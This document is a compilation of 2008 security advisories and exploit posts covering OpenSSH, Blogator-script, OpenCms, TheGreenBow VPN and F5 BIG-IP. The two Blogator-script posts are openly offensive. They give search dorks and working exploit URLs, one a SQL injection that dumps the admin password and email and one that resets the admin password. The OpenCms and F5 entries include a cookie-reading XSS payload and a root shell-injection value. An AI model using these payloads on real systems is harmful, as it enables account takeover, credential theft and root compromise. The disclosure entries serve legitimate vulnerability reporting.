[ GLSA 200804-03 ] OpenSSH: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200804-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSSH: Privilege escalation Date: April 05, 2008 Bugs: #214985, #215702 ID: 200804-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two flaws have been discovered in OpenSSH which could allow local attackers to escalate their privileges. Background == OpenSSH is a complete SSH protocol implementation that includes an SFTP client and server support. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-misc/openssh < 4.7_p1-r6>= 4.7_p1-r6 Description === Two issues have been discovered in OpenSSH: * Timo Juhani Lindfors discovered that OpenSSH sets the DISPLAY variable in SSH sessions using X11 forwarding even when it cannot bind the X11 server to a local port in all address families (CVE-2008-1483). * OpenSSH will execute the contents of the ".ssh/rc" file even when the "ForceCommand" directive is enabled in the global sshd_config (CVE-2008-1657). Impact == A local attacker could exploit the first vulnerability to hijack forwarded X11 sessions of other users and possibly execute code with their privileges, disclose sensitive data or cause a Denial of Service, by binding a local X11 server to a port using only one address family. The second vulnerability might allow local attackers to bypass intended security restrictions and execute commands other than those specified by "ForceCommand" if they are able to write to their home directory. Workaround == There is no known workaround at this time. Resolution == All OpenSSH users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/openssh-4.7_p1-r6" References == [ 1 ] CVE-2008-1483 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1483 [ 2 ] CVE-2008-1657 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1657 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200804-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: This is a digitally signed message part.
Blogator-script 0.95 SQL Injection Vulnerbility
# # #...:Blogator-script 0.95 SQL Injection Vulnerbility # Virangar Security Team www.virangar.org www.virangar.net Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) --- dork: inurl:/_blogadata/ --- vuln code in /_blogadata/include/sond_result.php: line 27: $id_art=$_GET['id_art']; .. line 34: $sql_res=mysql_query("SELECT sond_rep, votes_H, votes_F FROM sondage_rep WHERE id_sond = $id_art ORDER BY ordre"); vuln: http://www.site.com/_blogadata/include/sond_result.php?id_art=-9/**/union/**/select/**/concat(pseudo,0x3a,pass,char(58),email),2,3/**/from/**/membre/**/where/**/id_membre=1/* you can see in Blogator-script other injection bugs too ;)
Alkacon OpenCms sessions.jsp searchfilter XSS
Alkacon OpenCms sessions.jsp searchfilter XSS Product: Alkacon OpenCms http://www.opencms.org/ OpenCms contains a cross-site scripting vulnerability in the active session reporting function. Input to parameter searchfilter in page opencms/system/workplace/admin/workplace/sessions.jsp is not sufficiently validated and/or sanitized before it gets embedded in the resulting web page. Example: http://(target)/opencms/system/workplace/admin/workplace/sessions.jsp? ispopup=&action=listsearch&framename=&title= &closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Fpath%253D%252Fworkplace &preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems= &formname=ls-form&sortcol=&originalparams=&page=&style=new&root= &path=%252Fworkplace%252Fbroadcast&redirect= &searchfilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E &listSearchFilter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E The vulnerability has been identified in version 7.0.3. However, other versions may be also affected. Despite similarities this is a different vulnerability than CVE-2008-1510. Solution: Users should not browse untrusted sites while logged into OpenCms. Found by: nnposter
Blogator-script 0.95 Change User Password Vulnerbility
## # # # ...:Blogator-script 0.95 Change User Password Vulnerbility # ## Virangar Security Team www.virangar.org www.virangar.net Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) from emperor team :) --- dork: inurl:/_blogadata/ --- vuln code in /_blogadata/include/init_pass2.php: line 23: $id=$_GET['a']; line 24:$email=$_GET['b']; line 25: $mdp=$_GET['c']; . line 27: $sql_change_pass=mysql_query("UPDATE membre SET pass = '$mdp' WHERE id_membre = '$id' AND email LIKE '$email' LIMIT 1"); so if we put user id for $id and put %(any) for user email($email) and $mdp=newpassword.he he he :) vuln: http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b=% example:(change admin pass to 123456) http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=%
TheGreenBowVPN, Login Credentials Disclosure
Hi there, ### TheGreenBow IPSec VPN Client Login Credentials Information Disclosure Vulnerability Informations Risk: Low Typology: Local Date: 30/03/2008 Product: TheGreenBow IPSec VPN Client Version: 4.10.010 Vendor: http://www.thegreenbow.com/vpn.html Vendor Status: 29/03/2008 Vendor Informed 30/03/2008 - Reply from The Vendor 31/03/200/ - Patch Released Discovered By: Giuseppe `Evilcry` Bonfa' Description TheGreenBow IPSec VPN Client is an on demand IPSec VPN Client, compliant with most popular VPN gateways and with network tools to deploy security in large and medium enterprises. Highly efficient and easy to configure, the IPSec VPN Client also allows peer-to-peer VPN. PoC TheGreenBow IPSec VPN Client 4.10.010 is prone to a Login Credentials that could expose local users of TheGreenBow to a leak of Sensitive Informations, specifically an attacker could Carve, Login and Certificates used by the user, cause they are stored in clear in memory. This may lead complete User Impersonation. Attackers can exploit this issue to harvest VPN login credentials and gain unauthorized access to networks and resources protected by the VPN. All informations are stored in the meomory image of the process 'Tgbike.exe', so with a basical Process Memory Dumper. So we can identify some keywords to use for Credentials Carving: Xuser = Xpassword = # CERTIFICATES -Client-Private-Key] # A PDF version of the Advisory is available here: http://evilcry.altervista.org/tuts/theGreenBow.pdf Regards, Giuseppe 'Evilcry' Bonfa'
F5 BIG-IP Management Interface Perl Injection
F5 BIG-IP Management Interface Perl Injection Product: F5 BIG-IP http://www.f5.com/products/big-ip/ The F5 BIG-IP reconfiguration facility, used by both the web management interface and the CLI, suffers from insufficient input validation and/or sanitization of certain reconfiguration requests. It is possible for a logged-in user with Resource Manager or Administrator privileges to inject arbitrary Perl code, including spawning Unix shell commands, that gets immediately executed with root privileges. (For the Administrator role this does not provide any new privileges because it is already provided with full shell access as root.) The core of the problem is using Perl EP3 with templates containing substitutions similar to $val='NEW_VALUE'; without first escaping single quotes in NEW_VALUE; As an example, the SNMP community string configuration accepts the following value as an allowed source of SNMP requests: "none'.`touch /etc/foo`.'" It is possible to craft URL links that would inject the code with a simple HTTP GET request. Cross-site attacks may leverage this vulnerability to make an arbitrary change to the BIG-IP appliance. The vulnerability has been identified in version 9.4.3. However, other versions may be also affected. Found by: nnposter